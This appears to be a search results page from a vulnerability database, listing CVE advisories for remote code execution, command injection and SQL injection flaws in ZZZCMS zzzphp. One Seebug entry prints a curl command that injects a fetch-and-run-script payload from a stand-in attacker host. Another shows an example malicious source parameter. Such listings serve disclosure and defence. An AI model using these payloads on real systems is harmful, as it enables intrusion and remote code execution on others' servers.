Lucene search
+L

106 matches found

nuclei
nuclei
added 12 hours ago135 views

ZZZCMS zzzphp 2.1.0 - Remote Code Execution

ZZZCMS zzzphp v2.1.0 is susceptible to a remote command execution vulnerability via dangerkey at zzztemplate.php. id: CVE-2022-23881 info: name: ZZZCMS zzzphp 2.1.0 - Remote Code Execution author: pikpikcu severity: critical description: ZZZCMS zzzphp v2.1.0 is susceptible to a remote command...

9.8CVSS7.2AI score0.56509EPSS
Exploits1References5
nuclei
nuclei
added 12 hours ago20 views

ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)

ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzzfile.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter, exploit requires attacker to send malicious URL and...

9.8CVSS7.5AI score0.06589EPSS
Exploits1References2
redhatcve
redhatcve
added 2026/01/09 10:53 a.m.7 views

CVE-2022-23881

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

9.8CVSS7.7AI score0.56509EPSS
Exploits1References1
euvd
euvd
added 2025/10/07 12:30 a.m.7 views

EUVD-2019-7269

Malware in sbrugna...

7.5CVSS7.5AI score0.01436EPSS
Exploits1References2
euvd
euvd
added 2025/10/07 12:30 a.m.11 views

EUVD-2020-17585

Malware in sbrugna...

9.8CVSS9.4AI score0.02052EPSS
Exploits1References2
euvd
euvd
added 2025/10/07 12:30 a.m.7 views

EUVD-2019-7271

Malware in sbrugna...

9.8CVSS9.2AI score0.03116EPSS
Exploits1References2
euvd
euvd
added 2025/10/07 12:30 a.m.6 views

EUVD-2020-13085

Malware in sbrugna...

9.8CVSS9.2AI score0.02652EPSS
Exploits1References2
euvd
euvd
added 2025/10/07 12:30 a.m.9 views

EUVD-2019-2448

Malware in sbrugna...

9.8CVSS9.5AI score0.06589EPSS
Exploits1References2
redhatcve
redhatcve
added 2025/05/22 7:45 p.m.12 views

CVE-2021-32605

zzzcms zzzphp before 2.0.4 allows remote attackers to execute arbitrary OS commands by placing them in the keys parameter of a ?location=search URI, as demonstrated by an OS command within an "if" "end if" block...

9.8CVSS8AI score0.03794EPSS
Exploits3References1
redhatcve
redhatcve
added 2025/05/22 4:14 p.m.7 views

CVE-2020-24877

A SQL injection vulnerability in zzzphp v1.8.0 through /form/index.php?module=getjson may lead to a possible access restriction bypass...

9.8CVSS7.9AI score0.02052EPSS
Exploits1
redhatcve
redhatcve
added 2025/05/22 3:17 p.m.10 views

CVE-2020-20298

Eval injection vulnerability in the parserCommom method in the ParserTemplate class in zzztemplate.php in zzzphp 1.7.2 allows remote attackers to execute arbitrary commands...

9.8CVSS8AI score0.02652EPSS
Exploits1
vulncheck_kev
vulncheck_kev
added 2024/11/26 12:0 a.m.3 views

VulnCheck KEV: CVE-2019-10647

ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source parameter because of a lack of inc/zzzfile.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if...

9.8CVSS6.1AI score0.06589EPSS
Exploits1References1
attackerkb
attackerkb
added 2022/03/23 9:15 p.m.9 views

CVE-2022-23881

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

9.8CVSS7.5AI score0.56509EPSS
Exploits1References3
prion
prion
added 2022/03/23 9:15 p.m.15 views

Command injection

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

7.5CVSS9.7AI score0.56509EPSS
Exploits1References1Affected Software1
cve
cve
added 2022/03/23 8:9 p.m.131 views

CVE-2022-23881

ZZZCMS zzzphp 2.1.0 is affected by a remote code execution (RCE) vulnerability via danger_key() in zzz_template.php. Root cause: improper handling in danger_key() allows arbitrary code execution. Impact: attacker can execute code on affected systems (high/critical impact per sources). Exploitatio...

9.8CVSS9.7AI score0.56509EPSS
Exploits1References1Affected Software1
cvelist
cvelist
added 2022/03/23 8:9 p.m.40 views

CVE-2022-23881

ZZZCMS zzzphp v2.1.0 was discovered to contain a remote command execution RCE vulnerability via dangerkey at zzztemplate.php...

9.9AI score0.56509EPSS
Exploits1References1
cnnvd
cnnvd
added 2022/03/23 12:0 a.m.5 views

ZZZCMS zzzphp 安全漏洞

ZZZCMS zzzphp is a content management system CMS. A security vulnerability exists in ZZZCMS zzzphp version v2.1.0, which stems from incomplete filtering of user-entered parameters by the dangerkey function in zzztemplate.php...

9.8CVSS8.3AI score0.56509EPSS
Exploits1References2
seebug
seebug
added 2021/05/13 12:0 a.m.398 views

zzzcms zzzphp parserIfLabel模板注入远程执行代码漏洞(CVE-2021-32605)

curl -b 'keys=if:=curl http://attacker.tld/poc.sh|bashend if' 'http://target.tld/?location=search'...

7.5CVSS0.2AI score0.03794EPSS
Exploits3
osv
osv
added 2021/05/11 11:15 p.m.3 views

CVE-2021-32605

zzzcms zzzphp before 2.0.4 allows remote attackers to execute arbitrary OS commands by placing them in the keys parameter of a ?location=search URI, as demonstrated by an OS command within an "if" "end if" block...

9.8CVSS7.6AI score0.03794EPSS
Exploits3References2
nvd
nvd
added 2021/05/11 11:15 p.m.40 views

CVE-2021-32605

zzzcms zzzphp before 2.0.4 allows remote attackers to execute arbitrary OS commands by placing them in the keys parameter of a ?location=search URI, as demonstrated by an OS command within an "if" "end if" block...

9.8CVSS0.03794EPSS
Exploits3References2
Rows per page
Query Builder